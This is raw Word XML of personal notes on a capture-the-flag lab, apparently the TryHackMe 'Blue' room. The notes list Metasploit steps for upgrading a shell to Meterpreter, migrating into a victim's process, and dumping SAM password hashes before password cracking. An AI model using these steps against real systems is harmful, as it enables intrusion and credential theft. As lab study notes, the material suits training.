          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">put the current </w:t>
      </w:r>
      <w:r w:rsidR="004B0B79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">normal </w:t>
      </w:r>
      <w:r w:rsidR="004B0B79">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shell in background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E448126" w14:textId="24BBA1B8" w:rsidR="004B0B79" w:rsidRDefault="004B0B79" w:rsidP="00B52D6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Session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:i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to check the background shell</w:t>
      </w:r>
      <w:r w:rsidR="00664C77">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27543873" w14:textId="06535132" w:rsidR="004B0B79" w:rsidRDefault="004B0B79" w:rsidP="00B52D69">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B0B79">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004B0B79">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004B0B79">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B0B79">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shell_to_meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="455E944D" w14:textId="2D1F8586" w:rsidR="00BB17D2" w:rsidRPr="004B0B79" w:rsidRDefault="00BB17D2" w:rsidP="00B52D6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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17D2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>post/multi/manage/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB17D2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shell_to_meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7E70B389" w14:textId="329B0719" w:rsidR="004B0B79" w:rsidRDefault="004B0B79" w:rsidP="00B52D69">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B0B79">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004B0B79">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>Sho</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">w options </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; know that need to change the SESSION </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006C28B8" w14:textId="497DCB20" w:rsidR="00A87228" w:rsidRDefault="00A87228" w:rsidP="00B52D6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Set session </w:t>
      </w:r>
      <w:r w:rsidR="00B32386">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;id to upgrade&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40141814" w14:textId="68007405" w:rsidR="00A87228" w:rsidRDefault="00A87228" w:rsidP="00A87228">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="1440"/>
          <w:tab w:val="left" w:pos="2160"/>
          <w:tab w:val="left" w:pos="3744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Set LHOST </w:t>
      </w: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attacker </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6132082A" w14:textId="61E26958" w:rsidR="00390D3E" w:rsidRDefault="00F73C1E" w:rsidP="00A87228">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="1440"/>
          <w:tab w:val="left" w:pos="2160"/>
          <w:tab w:val="left" w:pos="3744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>Run !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="45F04908" w14:textId="7F26B956" w:rsidR="005D26D8" w:rsidRDefault="005D26D8" w:rsidP="00A87228">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="1440"/>
          <w:tab w:val="left" w:pos="2160"/>
          <w:tab w:val="left" w:pos="3744"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26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ab/>
      </w:r>
      <w:r w:rsidR="003D2C36">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B2BB3C" w14:textId="2CC81421" w:rsidR="00A1305E" w:rsidRDefault="00A1305E" w:rsidP="00A87228">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="1440"/>
          <w:tab w:val="left" w:pos="2160"/>
          <w:tab w:val="left" w:pos="3744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color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D0589A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proofErr w:type="gramStart"/>
      <w:r w:rsidR="000768D1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000768D1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> View running processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9FE0D5" w14:textId="12B90378" w:rsidR="00D0589A" w:rsidRDefault="00D0589A" w:rsidP="00A87228">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="1440"/>
          <w:tab w:val="left" w:pos="2160"/>
          <w:tab w:val="left" w:pos="3744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Migrate – di chuyển sang process khác của victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC6BF06" w14:textId="6DF1B5F6" w:rsidR="000768D1" w:rsidRDefault="000768D1" w:rsidP="00A87228">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="1440"/>
          <w:tab w:val="left" w:pos="2160"/>
          <w:tab w:val="left" w:pos="3744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Hashdump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– dump the contents from SAM database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E76E94" w14:textId="21C41E90" w:rsidR="00390D3E" w:rsidRPr="00390D3E" w:rsidRDefault="00390D3E" w:rsidP="00A87228">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="1440"/>
          <w:tab w:val="left" w:pos="2160"/>
          <w:tab w:val="left" w:pos="3744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ab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B11AD6" w14:textId="77777777" w:rsidR="00CD47D8" w:rsidRDefault="00A87228" w:rsidP="00B52D6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130FDF11" w14:textId="77777777" w:rsidR="00CD47D8" w:rsidRDefault="00CD47D8" w:rsidP="00CD47D8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="079D9BF6" w14:textId="62ED3F47" w:rsidR="00CD47D8" w:rsidRDefault="00CD47D8" w:rsidP="00CD47D8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Task 4: Password Cracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A17829" w14:textId="63FDF61F" w:rsidR="00CD47D8" w:rsidRPr="00CD47D8" w:rsidRDefault="00CD47D8" w:rsidP="00CD47D8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="76600E51" w14:textId="32F1F700" w:rsidR="00CD47D8" w:rsidRDefault="00CD47D8" w:rsidP="00CD47D8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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DE2FAE" w14:textId="5E122C70" w:rsidR="00A87228" w:rsidRPr="004B0B79" w:rsidRDefault="00A87228" w:rsidP="00B52D69">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="489307B4" w14:textId="77777777" w:rsidR="00106090" w:rsidRPr="004720B6" w:rsidRDefault="00106090" w:rsidP="00106090">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Rubik" w:hAnsi="Rubik"/>
          <w:color w:val="212529"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C3E512E" w14:textId="77777777" w:rsidR="00AB2AF6" w:rsidRPr="00AB2AF6" w:rsidRDefault="00AB2AF6" w:rsidP="00AB2AF6">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00AB2AF6" w:rsidRPr="00AB2AF6" w:rsidSect="001720C0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6E42" w14:textId="77777777" w:rsidR="00FE56C0" w:rsidRDefault="00FE56C0" w:rsidP="00AB2AF6">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="657F096F" w14:textId="77777777" w:rsidR="00FE56C0" w:rsidRDefault="00FE56C0" w:rsidP="00AB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8B22" w14:textId="77777777" w:rsidR="00FE56C0" w:rsidRDefault="00FE56C0" w:rsidP="00AB2AF6">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="40DA7F11" w14:textId="77777777" w:rsidR="00FE56C0" w:rsidRDefault="00FE56C0" w:rsidP="00AB2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223E1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4B3C89A0"/>
    <w:lvl w:ilvl="0" w:tplc="7FD48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55"/>
    <w:rsid w:val="00072432"/>
    <w:rsid w:val="000768D1"/>
    <w:rsid w:val="000D6F55"/>
    <w:rsid w:val="00106090"/>
    <w:rsid w:val="00154117"/>
    <w:rsid w:val="001720C0"/>
    <w:rsid w:val="001E246C"/>
    <w:rsid w:val="00212125"/>
    <w:rsid w:val="00390D3E"/>
    <w:rsid w:val="003D2C36"/>
    <w:rsid w:val="004720B6"/>
    <w:rsid w:val="004B0B79"/>
    <w:rsid w:val="004B639A"/>
    <w:rsid w:val="00547387"/>
    <w:rsid w:val="005D26D8"/>
    <w:rsid w:val="006145E6"/>
    <w:rsid w:val="00664C77"/>
    <w:rsid w:val="00712B46"/>
    <w:rsid w:val="007F7B4F"/>
    <w:rsid w:val="008B3583"/>
    <w:rsid w:val="008D4CD1"/>
    <w:rsid w:val="00916DAD"/>
    <w:rsid w:val="0095795E"/>
    <w:rsid w:val="009A1196"/>
    <w:rsid w:val="009D54A3"/>
    <w:rsid w:val="00A1305E"/>
    <w:rsid w:val="00A87228"/>
    <w:rsid w:val="00AB2AF6"/>
    <w:rsid w:val="00B07F45"/>
    <w:rsid w:val="00B32386"/>
    <w:rsid w:val="00B35E76"/>
    <w:rsid w:val="00B52D69"/>
    <w:rsid w:val="00BB17D2"/>
    <w:rsid w:val="00C70A31"/>
    <w:rsid w:val="00CC0DC8"/>
    <w:rsid w:val="00CD47D8"/>
    <w:rsid w:val="00D0589A"/>
    <w:rsid w:val="00DA513D"/>
    <w:rsid w:val="00E51D25"/>
    <w:rsid w:val="00E74179"/>
    <w:rsid w:val="00EA3904"/>
    <w:rsid w:val="00EF57AB"/>
    <w:rsid w:val="00F73C1E"/>
    <w:rsid w:val="00F81B67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C6EA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A436CDAB-B0CB-4DFC-97CC-D1B3E6E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21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17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154117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2A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2A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2A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infosec.com/tryhackme-walkthrough-blu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eflan-security.com/tryhackme-blue-walkthro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7B6E9-9560-4F35-B1E2-749A8291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Vu</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Alex Vu</cp:lastModifiedBy>
  <cp:revision>40</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-02-15T21:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-03T16:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>